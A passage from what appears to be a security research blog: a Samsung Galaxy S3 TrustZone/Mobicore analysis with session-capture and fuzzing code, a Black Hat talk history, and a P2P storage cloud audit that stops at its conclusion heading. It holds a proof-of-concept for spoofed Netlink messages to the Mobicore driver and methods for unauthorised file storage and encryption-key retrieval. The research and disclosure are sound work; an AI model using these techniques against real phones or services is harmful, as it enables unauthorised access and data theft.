
Thu, 6 Jun 2013

A software level analysis of TrustZone OS and Trustlets in Samsung Galaxy Phone

Introduction:


New types of mobile applications based on Trusted Execution Environments (TEEs), most notably ARM TrustZone micro-kernels, are emerging, and they require new security assessment tools and techniques. In this blog post we review an example TrustZone application on a Galaxy S3 phone and demonstrate how to capture the communication between the Android application and the TrustZone OS using an instrumented version of the Mobicore Android library. We also present a security issue in the Mobicore kernel driver that could allow unauthorised communication between low privileged Android processes and Mobicore enabled kernel drivers such as an IPSEC driver.


Mobicore OS:


The Samsung Galaxy S III was the first mobile phone to use the ARM TrustZone feature to host and run a secure micro-kernel on the application processor. This kernel, named Mobicore, is isolated from the handset's Android operating system at the CPU design level. Mobicore is a micro-kernel developed by Giesecke & Devrient GmbH (G&D) that uses the TrustZone security extension of ARM processors to create a secure program execution and data storage environment sitting next to the rich operating system (Android, Windows, iOS) of the mobile phone or tablet. The following figure, published by G&D, illustrates Mobicore's architecture:

Overview of Mobicore (courtesy of G&D)


A TrustZone enabled processor provides hardware level isolation of the above "Normal World" (NWd) and "Secure World" (SWd), meaning that the Secure World OS (Mobicore) and the programs running on top of it are immune to software attacks from the Normal World as well as to a wide range of hardware attacks on the chip. This forms a Trusted Execution Environment (TEE) for security critical applications such as digital wallets, electronic IDs and Digital Rights Management. The non-critical part of such an application, such as the user interface, can run in the Normal World operating system, while the critical code, private encryption keys and sensitive I/O operations such as PIN entry by the user are handled by the Secure World. By doing so, the application and its sensitive data remain protected against unauthorized access even if the Normal World operating system is fully compromised, as the attacker still cannot reach the critical part of the application running in the secure world.

Mobicore API:


The security critical applications that run inside the Mobicore OS are referred to as trustlets and are developed by third parties such as banks and content providers. The trustlet software development kit includes library files to develop, test and deploy trustlets, as well as the Android applications that communicate with the relevant trustlets via the Mobicore API for Android. Trustlets need to be encrypted, digitally signed and then remotely provisioned by G&D on the target mobile phone(s). The Mobicore API for Android consists of the following three components:


1) Mobicore client library, located at /system/lib/libMcClient.so: the library file used by Android OS or Dalvik applications to establish communication sessions with trustlets in the secure world.


2) Mobicore Daemon located at /system/bin/mcDriverDaemon: This service proxies Mobicore commands and responses between NWd and SWd via Mobicore device driver


3) Mobicore device driver: registers the /dev/mobicore misc device and performs ARM Secure Monitor Calls (SMC) to switch the context from the NWd to the SWd.


The source code for the above components can be downloaded from Google Code. I enabled verbose debug messages in the kernel driver and recompiled a Samsung S3 kernel image for the purpose of this analysis. Note that you need to download the kernel source tree and stock ROM matching your S3 phone's kernel build number, which can be found under "Settings->About device". After compiling the new zImage file, you need to insert it into a custom ROM and flash your phone. To build the custom ROM I used "Android ROM Kitchen 0.217", which has the option to unpack the zImage from the stock ROM, replace it with the newly compiled zImage and pack it again.


By studying the source code of the user API library and observing debug messages from the kernel driver, I worked out the following data flow between the Android OS and Mobicore for establishing a session and communicating with a trustlet (a code sketch of the same flow follows the list):


1) The Android application calls the mcOpenDevice() API, which causes the Mobicore Daemon (/system/bin/mcDriverDaemon) to open a handle to the /dev/mobicore misc device.


2) It then allocates a World Shared Memory (WSM) buffer by calling mcMallocWsm(), which causes the Mobicore kernel driver to allocate a WSM buffer of the requested size and map it into the user space application's process. This shared memory buffer is later used by the Android application and the trustlet to exchange commands and responses.


3) mcOpenSession() is called with the UUID of the target trustlet (a 16 byte value matching the trustlet's registry file name, for instance ffffffff000000000000000000000003 for the PlayReady DRM trustlet) and the allocated WSM address, to establish a session with the target trustlet through the shared memory.


4) Android applications have the option to attach additional memory buffers (up to 6, with a maximum size of 1MB each) to the established session by calling the mcMap() API. In the case of the PlayReady DRM trustlet, which is used by the Samsung VideoHub application, two additional buffers are attached: one for sending and receiving parameters and the other for receiving the trustlet's text output.


5) The application copies the command and parameter types to the WSM, along with the parameter values in the second allocated buffer, and then calls the mcNotify() API to notify Mobicore that a pending command is waiting in the WSM to be dispatched to the target trustlet.


6) The mcWaitNotification() API is called with a timeout value; it blocks until a response is received from the trustlet. If the response is not an error, the application can read the trustlet's returned data, output text and parameter values from the WSM and the two additional mapped buffers.


7) At the end of the session the application calls mcUnmap(), mcFreeWsm() and mcCloseSession().
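
Putting the seven steps together, the flow maps onto a short client program. The sketch below is illustrative only: the function names are the ones listed above, while the exact signatures and constants (MC_DEVICE_ID_DEFAULT, MC_INFINITE_TIMEOUT, the buffer sizes) are taken from the open-source MobiCoreDriverApi.h header and should be treated as assumptions rather than a verified, drop-in client.

/*
 * Minimal sketch of the session flow described above, written against the
 * open-source Mobicore client library (libMcClient.so). Signatures and
 * constants follow the MobiCoreDriverApi.h header from the Google Code
 * release and are assumptions, not verified against the phone's binary.
 */
#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include "MobiCoreDriverApi.h"   /* mcOpenDevice(), mcMallocWsm(), ... */

#define WSM_LEN  4096            /* size of the world shared memory buffer (assumed) */
#define BUF_LEN  (1024 * 1024)   /* additional mapped buffer, up to 1MB per the API  */

int main(void)
{
    /* UUID of the PlayReady DRM trustlet, matching its mcRegistry file name */
    const mcUuid_t uuid = { { 0xff, 0xff, 0xff, 0xff, 0, 0, 0, 0,
                              0,    0,    0,    0,    0, 0, 0, 3 } };
    mcSessionHandle_t session = { 0 };
    mcBulkMap_t map = { 0 };
    uint8_t *wsm = NULL;
    static uint8_t params[BUF_LEN];

    /* 1) open a handle to /dev/mobicore via the Mobicore daemon */
    if (mcOpenDevice(MC_DEVICE_ID_DEFAULT) != MC_DRV_OK)
        return 1;

    /* 2) allocate the World Shared Memory (WSM) buffer */
    if (mcMallocWsm(MC_DEVICE_ID_DEFAULT, 0, WSM_LEN, &wsm, 0) != MC_DRV_OK)
        return 1;

    /* 3) open a session to the trustlet over the WSM */
    session.deviceId = MC_DEVICE_ID_DEFAULT;
    if (mcOpenSession(&session, &uuid, wsm, WSM_LEN) != MC_DRV_OK)
        return 1;

    /* 4) attach an additional buffer for command parameters */
    if (mcMap(&session, params, sizeof(params), &map) != MC_DRV_OK)
        return 1;

    /* 5) place a command in the WSM (layout is trustlet specific) and notify */
    memset(wsm, 0, WSM_LEN);
    mcNotify(&session);

    /* 6) block until the trustlet answers, then read the response from wsm/params */
    if (mcWaitNotification(&session, MC_INFINITE_TIMEOUT) == MC_DRV_OK)
        printf("trustlet responded, first WSM byte: 0x%02x\n", wsm[0]);

    /* 7) tear the session down */
    mcUnmap(&session, params, &map);
    mcCloseSession(&session);
    mcFreeWsm(MC_DEVICE_ID_DEFAULT, wsm);
    mcCloseDevice(MC_DEVICE_ID_DEFAULT);
    return 0;
}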


The Mobicore kernel driver is the only component in the Android operating system that interacts directly with the Mobicore OS, using the ARM CPU's SMC instruction and secure interrupts. The interrupt number registered by the Mobicore kernel driver on the Samsung S3 phone is 47, which may differ on other phone or tablet boards. The Mobicore OS uses the same interrupt to notify the kernel driver in the Android OS when it writes data back.
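
For completeness, the world switch itself boils down to loading a command into registers and executing the SMC instruction, which traps into the secure monitor. The fragment below is a generic ARM sketch of that pattern; the register usage follows the common r0/r1 fastcall convention and is an assumption, not the exact Mobicore fastcall structure:

/*
 * Illustrative only: a generic ARM "fastcall" into the secure world. The real
 * Mobicore driver wraps this in its own command structures.
 */
static inline unsigned int smc_fastcall(unsigned int cmd, unsigned int param)
{
    register unsigned int r0 asm("r0") = cmd;    /* fastcall command id */
    register unsigned int r1 asm("r1") = param;  /* command parameter   */

    asm volatile(
        ".arch_extension sec\n\t"
        "smc #0"                  /* trap into the secure monitor (world switch) */
        : "+r"(r0), "+r"(r1)      /* the monitor may return values in r0/r1      */
        :
        : "memory");

    return r0;                    /* secure world return code */
}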


Analysis of a Mobicore session:


There are currently 5 trustlets pre-loaded on the European S3 phones as listed below:


shell@android:/ # ls /data/app/mcRegistry


00060308060501020000000000000000.tlbin
02010000080300030000000000000000.tlbin
07010000000000000000000000000000.tlbin
ffffffff000000000000000000000003.tlbin
ffffffff000000000000000000000004.tlbin
ffffffff000000000000000000000005.tlbin


The 07010000000000000000000000000000.tlbin is the "Content Management" trustlet, which G&D uses to install and update other trustlets on target phones. The 00060308060501020000000000000000.tlbin and ffffffff000000000000000000000003.tlbin are DRM related trustlets developed by Discretix. I chose to analyse the PlayReady DRM trustlet (ffffffff000000000000000000000003.tlbin), as it is used by the Samsung VideoHub application, which is pre-loaded on European S3 phones.


The VideoHub application does not communicate directly with the PlayReady trustlet. Instead, the Android DRM manager loads several DRM plugins, including libdxdrmframeworkplugin.so, which depends on the libDxDrmServer.so library that makes the Mobicore API calls. Both of these libraries are closed source, so I had to perform dynamic analysis to monitor the communication between libDxDrmServer.so and the PlayReady trustlet. For this purpose I could have installed API hooks in the Android DRM manager process (drmserver) and recorded the parameter values passed to the Mobicore user library (/system/lib/libMcClient.so) by setting the LD_PRELOAD environment variable in the init.rc script and flashing my phone with the new ROM. I found this approach unnecessary, as the source code for the Mobicore user library is available and I could add simple instrumentation code to it that saves the API calls and the related world shared memory buffers to a log file. In order to compile such a modified Mobicore library, you need to place it under the Android source code tree on a 64 bit machine (Android 4.1.1 requires a 64 bit machine to compile) with 30 GB of disk space. To save you this trouble, you can download a copy of my instrumented Mobicore user library from here. You need to create an empty log file at /data/local/tmp/log and replace the original library with the instrumented one (DO NOT FORGET TO BACKUP THE ORIGINAL FILE). If you reboot the phone, the Mobicore session between Android's DRM server and the PlayReady trustlet will be logged to /data/local/tmp/log. A sample of such a session log is shown below:



The content and addresses of the world shared memory and the two additional mapped buffers are recorded in the above file. The command/response format in the WSM buffer is very similar to APDU communication in smart card applications, which is no surprise, as G&D has a long history in smart card technology. The next step was to interpret the command/response data so that we could manipulate it later and observe the trustlet's behaviour. The trustlet's text output, together with inspection of the assembly code of libDxDrmServer.so, helped me figure out the PlayReady trustlet command and response format as follows:


client command (wsm) : 08022000b420030000000001000000002500000028023000300000000500000000000000000000000000b0720000000000000000


client parameters (mapped buffer 1): 8f248d7e3f97ee551b9d3b0504ae535e45e99593efecd6175e15f7bdfd3f5012e603d6459066cc5c602cf3c9bf0f705b


trustlet response (wsm):08022000b420030000000081000000002500000028023000300000000500000000000000000000000000b0720000000000000000


trustlet text output (mapped buffer 2):


==================================================
SRVXInvokeCommand command 1000000 hSession=320b4
SRVXInvokeCommand. command = 0x1000000 nParamTypes=0x25
SERVICE_DRM_BBX_SetKeyToOemContext - pPrdyServiceGlobalContext is 32074
SERVICE_DRM_BBX_SetKeyToOemContext cbKey=48
SERVICE_DRM_BBX_SetKeyToOemContext type=5
SERVICE_DRM_BBX_SetKeyToOemContext iExpectedSize match real size=48
SERVICE_DRM_BBX_SetKeyToOemContext preparing local buffer DxDecryptAsset start - iDatatLen=32, pszInData=0x4ddf4 pszIntegrity=0x4dde4
DxDecryptAsset calling Oem_Aes_SetKey DxDecryptAsset
calling DRM_Aes_CtrProcessData DxDecryptAsset
calling DRM_HMAC_CreateMAC iDatatLen=32 DxDecryptAsset
after calling DRM_HMAC_CreateMAC DxDecryptAsset
END SERVICE_DRM_BBX_SetKeyToOemContext
calling DRM_BBX_SetKeyToOemContext
SRVXInvokeCommand.id=0x1000000 res=0x0
==============================================


By mapping the information disclosed in the trustlet's text output onto the client command, the following format was derived (a struct view of the same layout follows the breakdown):


08022000 : virtual memory address of the text output buffer in the secure world (little endian format of 0x200208)


b4200300 : PlayReady session ID


00000001: Command ID (0x1000000)


00000000: Error code (0x0 = no error, set by the trustlet after mcWaitNotification)


25000000: Parameter type (0x25)


28023000: virtual memory address of the parameters buffer in the secure world (little endian format of 0x300228)


30000000: Parameters length in bytes (0x30, encrypted key length)


05000000: encryption key type (0x5)
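
For clarity, the same breakdown can be expressed as a packed structure overlaying the first 32 bytes of the WSM. The field names below are my own labels for the observed dump, not a published Mobicore or Discretix definition; all values are stored little endian by the client:

#include <stdint.h>

/* Interpretation of the first 32 bytes of the PlayReady WSM command. */
#pragma pack(push, 1)
typedef struct {
    uint32_t text_out_addr;  /* 0x00200208: SWd address of the text output buffer */
    uint32_t session_id;     /* 0x000320b4: PlayReady session id (hSession)       */
    uint32_t command_id;     /* 0x01000000: SRVXInvokeCommand id                  */
    uint32_t error_code;     /* 0x0: set by the trustlet after mcWaitNotification */
    uint32_t param_types;    /* 0x25                                              */
    uint32_t param_addr;     /* 0x00300228: SWd address of the parameter buffer   */
    uint32_t param_len;      /* 0x30: length of the encrypted key                 */
    uint32_t key_type;       /* 0x5                                               */
} prdy_wsm_cmd_t;
#pragma pack(pop)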


The trustlet receives client supplied memory addresses as input, which could be manipulated by an attacker; we test this attack later. The captured PlayReady session involved 18 command/response pairs, which correspond to the following high level diagram of the PlayReady DRM flow published by G&D. I could not find a more detailed specification of PlayReady DRM on MSDN or elsewhere, but at this stage I was not interested in the implementation details of the PlayReady scheme: I did not want to attack the DRM itself, but to find an exploitable issue such as a buffer overflow or memory disclosure in the trustlet.

DRM Trustlet diagram (courtesy of G&D)


Security Tests:


I started by auditing the Mobicore daemon and kernel driver source code for issues that could be exploited by an Android application to attack other applications or to execute code in the Android kernel space. I found one issue in the Mobicore kernel API, which is designed to provide Mobicore services to other Android kernel components such as an IPSEC driver. The Mobicore driver registers a Linux Netlink server with id 17, intended to be called from kernel space; however, a user space process can craft a spoofed message using a NETLINK socket and send it to the Mobicore kernel driver's Netlink listener, which, as shown in the following figure, did not check the PID of the calling process. As a result, any Android app could call the Mobicore kernel APIs with spoofed session IDs. The vulnerable code snippet from MobiCoreKernelApi/main.c is included below.



An attacker would need to know the sequence number of an already established Netlink connection between a kernel component (such as IPSEC) and the Mobicore driver in order to exploit this vulnerability. These sequence numbers were incremental, starting from zero, but since there is currently no kernel component on the Samsung phone that uses the Mobicore kernel API, the issue is not high risk. We notified the vendor about this issue six months ago but have not received any response regarding a planned fix. The following figures demonstrate exploitation of this issue from an unprivileged Android process:

Netlink message (seq=1) sent to Mobicore kernel driver from a low privileged process


Unauthorised netlink message being processed by the Mobicore kernel driver
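
To illustrate the spoofing primitive shown in the figures, the sketch below sends a message with an attacker-chosen sequence number to a kernel Netlink listener on protocol 17 from an unprivileged process. The payload here is a placeholder; a real exploit would have to reproduce the command layout expected by MobiCoreKernelApi/main.c, which is omitted:

/*
 * Sketch: hand a spoofed message to the Mobicore kernel API's Netlink listener
 * (protocol 17) from unprivileged userspace. The socket, destination and
 * sequence number are entirely under the caller's control.
 */
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <linux/netlink.h>

#define NETLINK_MOBICORE 17           /* protocol id registered by the driver */

int main(void)
{
    char payload[] = "spoofed";       /* placeholder for a crafted Mobicore command */
    char buf[NLMSG_SPACE(sizeof(payload))];
    struct sockaddr_nl dst = { .nl_family = AF_NETLINK, .nl_pid = 0 }; /* 0 = kernel */
    struct nlmsghdr *nlh = (struct nlmsghdr *)buf;
    struct iovec iov;
    struct msghdr msg = { 0 };

    int sock = socket(AF_NETLINK, SOCK_RAW, NETLINK_MOBICORE);
    if (sock < 0) {
        perror("socket");
        return 1;
    }

    memset(buf, 0, sizeof(buf));
    nlh->nlmsg_len   = NLMSG_LENGTH(sizeof(payload));
    nlh->nlmsg_pid   = getpid();      /* sender pid, not validated by the driver */
    nlh->nlmsg_flags = 0;
    nlh->nlmsg_seq   = 1;             /* guessed sequence number of an existing session */
    memcpy(NLMSG_DATA(nlh), payload, sizeof(payload));

    iov.iov_base    = nlh;
    iov.iov_len     = nlh->nlmsg_len;
    msg.msg_name    = &dst;
    msg.msg_namelen = sizeof(dst);
    msg.msg_iov     = &iov;
    msg.msg_iovlen  = 1;

    if (sendmsg(sock, &msg, 0) < 0)
        perror("sendmsg");

    close(sock);
    return 0;
}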


In the next phase of my tests I focused on fuzzing the PlayReady DRM trustlet mentioned in the previous section, by writing simple C programs linked against libMcClient.so and manipulating DWORD values such as the shared buffer virtual addresses. The following table summarises the results, and the mutation step itself is sketched after the table:
WSM offset 0 - memory address of the mapped output buffer in the trustlet process (original value = 0x08022000):
    values < 0x08022000: the fuzzer crashed
    values > 0x08022000: no errors

WSM offset 41 - memory address of the parameter mapped buffer in the trustlet process (original value = 0x28023000):
    0x00001000 < value < 0x28023000: the fuzzer crashed
    value >= 0x00001000: the trustlet exits with "parameter refers to secure memory area"
    value > 0x28023000: no errors

WSM offset 49 - parameter length (encryption key or certificate file length):
    for large values the trustlet exits with a "malloc() failed" message
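
The mutation step in those fuzzers is trivial: restore the captured command into the WSM, overwrite one little endian DWORD at the offset under test, then notify the trustlet and wait for the outcome. A sketch, assuming a session set up as in the earlier example (the 5 second timeout is an arbitrary choice):

#include <stdint.h>
#include <string.h>
#include "MobiCoreDriverApi.h"

/* Overwrite one DWORD at a chosen WSM offset (0, 41, 49, ...) and dispatch. */
static mcResult_t fuzz_dword(mcSessionHandle_t *session, uint8_t *wsm,
                             const uint8_t *original, uint32_t wsm_len,
                             uint32_t offset, uint32_t value)
{
    memcpy(wsm, original, wsm_len);              /* start from the captured command */
    memcpy(wsm + offset, &value, sizeof(value)); /* inject the mutated DWORD        */

    mcNotify(session);
    return mcWaitNotification(session, 5000);
}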

The fuzzer crashes indicated that the Mobicore micro-kernel writes to normal world memory addresses beyond the shared memory buffer, which is not a critical security issue: it means the fuzzer can only attack itself and not other processes. The "parameter refers to secure memory area" message suggests that some input validation is implemented in the Mobicore OS or the DRM trustlet to prevent the normal world from referencing mapped addresses other than the shared buffers. I have not yet fuzzed the parameter values themselves, such as the PlayReady XML data elements sent from the client to the trustlet, and there may well be vulnerabilities in the PlayReady implementation that smarter fuzzing could pick up.


Conclusion:


We demonstrated that intercepting and manipulating World Shared Memory (WSM) data can be used to gain better insight into the internal workings of Mobicore trustlets. We believe this method can be combined with side channel measurements to perform blackbox security assessments of mobile TEE applications. The context switching and memory sharing between the normal and secure worlds could be subject to side channel attacks in specific cases, and we are focusing our future research on this area.

Sat, 1 Jun 2013

Honey, I’m home!! - Hacking Z-Wave & other Black Hat news

You've probably never thought of this, but the home automation market in the US was worth approximately $3.2 billion in 2010 and is expected to exceed $5.5 billion in 2016.


Under the hood, the Zigbee and Z-Wave wireless communication protocols are the most commonly used RF technologies in home automation systems. Zigbee is based on an open specification (IEEE 802.15.4) and has been the subject of several academic and practical security research efforts. Z-Wave is a proprietary wireless protocol that operates in the Industrial, Scientific and Medical (ISM) radio band. It transmits on 868.42 MHz (Europe) and 908.42 MHz (United States) and is designed for low-bandwidth data communication in embedded devices such as security sensors, alarms and home automation control panels.


Unlike Zigbee, almost no public security research had been done on the Z-Wave protocol, except for a DefCon 2011 talk in which the presenter pointed to the possibility of capturing the AES key exchange ... until now. Our Black Hat USA 2013 talk explores the security of the Z-Wave protocol and shows how it can be subjected to attacks.


The talk is being presented by Behrang Fouladi, a Principal Security Researcher at SensePost, with some help on the hardware side from our friend Sahand Ghanoun. Behrang is one of our most senior and most respected analysts. He loves poetry, movies with Owen Wilson, snowboarding and long walks on the beach. Wait - no - that's me. Behrang's the guy who lives in London and has a Masters from Royal Holloway. He's also the guy who figured out how to clone the SecurID software token.


Amazingly, this is the 11th time we've presented at Black Hat Las Vegas. We try and keep track of our talks and papers at conferences on our research services site, but for your reading convenience, here's a summary of our Black Hat talks over the last decade:



2002: Setiri : Advances in trojan technology (Roelof Temmingh)


Setiri was the first publicized trojan to implement the concept of using a web browser to communicate with its controller, and it caused a stir when we presented it in 2002. We were also very pleased when it was referenced in a 2004 book by Ed Skoudis.


2003: Putting the tea back into cyber terrorism (Charl van der Walt, Roelof Temmingh and Haroon Meer)


A paper about targeted, effective, automated attacks that could be used in countrywide cyber terrorism. A worm that targets internal networks was also discussed as an example of such an attack. In some ways, the thinking in this talk eventually led to the creation of Maltego.


2004: When the tables turn (Charl van der Walt, Roelof Temmingh and Haroon Meer)


This paper presented some of the earliest ideas on offensive strike-back as a network defence methodology, which later found their way into Neil Wyler's 2005 book "Aggressive Network Self-Defence".


2005: Assessment automation (Roelof Temmingh)


Our thinking around pentest automation, and in particular footprinting and link analysis, was further expanded upon. Here we also released the first version of our automated footprinting tool - "Bidiblah".


2006: A tail of two proxies (Roelof Temmingh and Haroon Meer)


In this talk we literally did introduce two proxy tools. The first was "Suru", our HTTP MITM proxy and a then-contender to the @stake Web Proxy. Although Suru has long since been surpassed by excellent tools like "Burp Proxy", it introduced a number of exciting new concepts, including trivial fuzzing, token correlation and background directory brute-forcing. Further improvements included timing analysis and indexable directory checks. These were not available in other commercial proxies at the time, hence our need to write our own.


Another pioneering MITM proxy - WebScarab from OWASP - also shifted thinking at the time. It was originally written by Rogan Dawes, our very own pentest team leader.


The second proxy we introduced operated at the TCP layer, leveraging the very excellent Scapy packet manipulation program. We never took it any further, however.


2007: It's all about timing (Haroon Meer and Marco Slaviero)


This was one of my favourite SensePost talks. It kicked off a series of research projects concentrating on timing-based inference attacks against all kinds of technologies and introduced a weaponized timing-based data exfiltration attack in the form of our Squeeza SQL Injection exploitation tool (you probably have to be South African to get the joke). This was also the first talk in which we Invented Our Own Acronym.


2008: Pushing a camel through the eye of a needle (Haroon Meer, Marco Slaviero & Glenn Wilkinson)


In this talk we expanded on our ideas of using timing as a vector for data extraction in so-called 'hostile' environments. We also introduced our 'reDuh' TCP-over-HTTP tunnelling tool, which can be used to create a TCP circuit through validly formed HTTP requests. Essentially this means that if we can upload a JSP/PHP/ASP page onto a compromised server, we can trivially connect to hosts behind that server. We also demonstrated how reDuh could be implemented under OLE right inside a compromised SQL 2005 server, even without 'sa' privileges.


2009: Clobbering the cloud (Haroon Meer, Marco Slaviero and Nicholas Arvanitis)


Yup, we did cloud before cloud was cool. This was a presentation about security in the cloud, covering issues such as privacy, monoculture and vendor lock-in. The cloud offerings from Amazon, Salesforce and Apple, as well as their security, were examined. We got an email from Steve "Woz" Wozniak, we quoted Dan Geer and we had a photo of Dino Dai Zovi. We built an HTTP brute-forcer on Force.com and (best of all) we hacked Apple using an iPhone.


2010: Cache on delivery (Marco Slaviero)


This was a presentation about mining information from memcached. We introduced go-derper.rb, a tool we developed for hacking memcached servers, and gave a few examples, including a sexy hack of bps.org. It seemed like people weren't getting our point at first, but later the penny dropped and to date we've had almost 50,000 hits on the presentation on Slideshare.


2011: Sour pickles (Marco Slaviero)


Python's Pickle module provides a known capability for running arbitrary Python functions and, by extension, permitting remote code execution; however, there was no public Pickle exploitation guide, and published exploits were simple examples only. In this paper we described the Pickle environment, outlined the hurdles facing a shellcoder and provided guidelines for writing Pickle shellcode. A brief survey of public Python code was undertaken to establish the prevalence of the vulnerability, and a shellcode generator and Pickle mangler were written. Output from the paper included helpful guidelines and templates for shellcode writing, tools for Pickle hacking and a shellcode library. We also wrote a very fancy paper about it all...


We didn't present at Black Hat USA in 2012, although we did do some very cool work that year.


For this year's show we'll be back on the podium with Behrang's talk, as well as an entire suite of excellent training courses. To meet the likes of Behrang and the rest of our team, please consider one of our courses. We need all the support we can get and we're pretty convinced you won't be disappointed.


See you in Vegas!

Fri, 12 Apr 2013

Analysis of Security in a P2P storage cloud

A cloud storage service such as Microsoft SkyDrive requires building data centers and carries ongoing operational and maintenance costs. An alternative approach is a distributed computing model that uses a portion of the storage and processing resources of consumer level computers and SME NAS devices to form a peer to peer storage system. Members contribute some of their local storage space to the system and in return receive an "online backup and data sharing" service. Providing data confidentiality, integrity and availability in such a decentralised storage system is a big challenge. As the cost of data storage devices declines, there is a debate as to whether P2P storage can really be cost saving or not. I leave this debate to the critics and instead look into one peer to peer storage system and study its security measures and possible issues. An overview of this system's architecture is shown in the following picture:


Each node in the storage cloud receives an amount of free online storage space, which can be increased by the control server if the node agrees to "contribute" some of its local hard drive space to the system. The file synchronisation and contribution agents running on every node interact with the cloud control server and with other nodes as shown in the above picture. Folder/file synchronisation is performed in the following steps:



1) The node authenticates itself to the control server and sends a file upload request with file metadata, including the SHA1 hash value, size, number of fragments and file name, over an HTTPS connection.


2) The control server replies with the AES encryption key for the relevant file/folder, an [IP Address]:[Port number] list of contributing nodes called the "endpoints list", and a file ID.


3) The file is split into blocks, each of which is encrypted with the above AES encryption key. The blocks are further split into 64 fragments and redundancy information is added to them.


4) The node then connects to the contribution agent on each endpoint address received in step 2 and uploads one fragment to each of them (the client-side data preparation in step 3 is sketched after this list).
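
The client-side data preparation in step 3 can be sketched as follows. The AES-256-CBC mode, single-block processing and the omission of the redundancy coding are assumptions made for illustration; the real agent's parameters were not reverse engineered to that level of detail:

/*
 * Sketch of step 3: encrypt one plaintext block with the folder's AES key
 * received from the control server, then cut the ciphertext into 64 equally
 * sized fragments ready for upload to the endpoints.
 */
#include <stdlib.h>
#include <string.h>
#include <openssl/evp.h>
#include <openssl/rand.h>

#define NUM_FRAGS 64   /* fragments per block, per step 3 */

/* Returns the fragment size, or -1 on failure. frags must point to NUM_FRAGS
 * buffers of at least (block_len / NUM_FRAGS + 32) bytes each. */
static int prepare_block(const unsigned char *block, int block_len,
                         const unsigned char key[32], unsigned char iv[16],
                         unsigned char **frags)
{
    unsigned char *enc = malloc(block_len + 32);  /* room for CBC padding */
    int out_len = 0, tail = 0, frag_len;

    if (enc == NULL)
        return -1;
    if (!RAND_bytes(iv, 16)) {
        free(enc);
        return -1;
    }

    EVP_CIPHER_CTX *ctx = EVP_CIPHER_CTX_new();
    EVP_EncryptInit_ex(ctx, EVP_aes_256_cbc(), NULL, key, iv);
    EVP_EncryptUpdate(ctx, enc, &out_len, block, block_len);
    EVP_EncryptFinal_ex(ctx, enc + out_len, &tail);
    EVP_CIPHER_CTX_free(ctx);
    out_len += tail;

    /* cut the ciphertext into 64 fragments; redundancy information would be
     * computed and appended here before each fragment is sent to an endpoint */
    frag_len = (out_len + NUM_FRAGS - 1) / NUM_FRAGS;
    for (int i = 0; i < NUM_FRAGS; i++) {
        int off = i * frag_len;
        int n = (out_len - off) > frag_len ? frag_len : (out_len - off);
        if (n > 0)
            memcpy(frags[i], enc + off, n);
    }

    free(enc);
    return frag_len;
}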


Since the system's nodes are not under the full control of the control server, they may fall offline at any time, or the stored file fragments may be damaged or modified intentionally. As such, the control server needs to monitor node and fragment health regularly so that it can move lost or damaged fragments to alternative nodes when needed. For this purpose, the contribution agent on each node maintains an HTTPS connection to the control server over which it receives the following "tasks":


a) Adjust settings: instructs the node to modify its upload/download limits, contribution size and so on.


b) Block check: asks the node to connect to another contribution node and verify a fragment's existence and hash value.


c) Block recovery: asks the node to assist the control server in recovering a number of fragments.


By delegating the above tasks, the control system places some degree of "trust" in, or at least makes "assumptions" about, the availability and integrity of the agent software running on the storage cloud nodes. However, those agents can be manipulated by malicious nodes in order to disrupt cloud operations, attack other nodes or even gain unauthorised access to the distributed data. I limited the scope of my research to the synchronisation and contribution agent software of two storage nodes under my control, one of which was acting as a contribution node. I did not include analysis of the system's encryption or redundancy in this preliminary research, because that could affect the live system and should only be performed in a test environment, which was not possible to set up as the target system's control server is not publicly available. Within the contribution agent alone, I identified that I had unauthorised file storage (and download) on the cloud's nodes, as well as unauthorised access to the folder encryption keys.


a) Unauthorised file storage and download


The contribution agent created a TCP network listener that processed commands from the control server as well as requests from other nodes. The agent communicated over HTTP(S) with the control server and the other nodes in the cloud. An example file fragment upload request from a remote node is shown below:



Uploading fragments with a path name of a similar format to the above resulted in a "bad request" error from the agent. This indicated that the fragment name must be related to its content, and that this condition is checked by the contribution agent before accepting the PUT request. By decompiling the agent software, it was found that the fragment name must have the following format to pass this validation:


<SHA1(uploaded content)>.<Fragment number>.<Global Folder Id>
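
For illustration, a name that passes this validation can be generated with a few lines of C. OpenSSL provides the SHA1; the fragment number and the folder id (the latter reusing a value that appears later in this post) are arbitrary example values:

#include <stdio.h>
#include <openssl/sha.h>

/* Build <SHA1(content)>.<Fragment number>.<Global Folder Id> for an upload. */
static void fragment_name(const unsigned char *data, size_t len,
                          unsigned int frag_no, const char *folder_id,
                          char *out, size_t out_len)
{
    unsigned char digest[SHA_DIGEST_LENGTH];
    char hex[2 * SHA_DIGEST_LENGTH + 1];

    SHA1(data, len, digest);
    for (int i = 0; i < SHA_DIGEST_LENGTH; i++)
        sprintf(&hex[2 * i], "%02x", digest[i]);

    snprintf(out, out_len, "%s.%u.%s", hex, frag_no, folder_id);
}

int main(void)
{
    const unsigned char payload[] = "arbitrary attacker-chosen content";
    char name[128];

    fragment_name(payload, sizeof(payload) - 1, 1, "1099869693336", name, sizeof(name));
    printf("fragment name: %s\n", name);  /* used as the path of the HTTP PUT request */
    return 0;
}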


I used the above fragment name format to successfully upload notepad.exe to the remote node, as you can see in the following figure:



The download request (a GET request) was also successful, regardless of the validity of the "Global Folder Id" and "Fragment Number". The uploaded file was accessible for about 24 hours, until it was purged automatically by the contribution agent, probably because it did not receive any "Block Check" requests from the control server for this fragment. Twenty-four hours is still enough time for malicious users to abuse storage cloud nodes' bandwidth and storage to serve their content over the internet without the victims' knowledge.


b) Unauthorised access to folder encryption keys


The network listener responded to GET requests from any remote node, as mentioned above. This was intended to serve "Block Check" commands from the control server, which instruct a node to fetch a number of fragments from other nodes (referred to as "endpoints"), verify their integrity by re-calculating the SHA1 hash, and report back to the control server. This could be part of the cloud's "health check" process to ensure that the distributed file fragments are accessible and have not been tampered with. The agent could also process "File Recovery" tasks from the control server, but I did not observe any such command during dynamic analysis of the contribution agent, so I searched the decompiled code for clues about the file recovery process and found a code snippet which suggests that the agent is capable of retrieving encryption keys from the control server. This was odd, considering that each node should only have access to its own folders' encryption keys, while it stores encrypted file fragments belonging to other nodes.


One possible explanation for the above file recovery code is that the node first downloads its own file fragments from remote endpoints (using an endpoint list received from the control server) and then retrieves the required folder encryption key from the control server in order to decrypt and re-assemble its own files. To test whether it is possible to abuse the file recovery operation to gain access to the encryption keys of folders belonging to other nodes, I extracted the folderInfo request format from the agent code and set up another storage node as a target. The test was successful, as shown in the following figure, and it was possible to retrieve the AES-256 encryption key for the Folder Id "1099869693336". This could enable an attacker who has set up a contributing storage node to decrypt fragments that belong to other cloud users.



Conclusion:


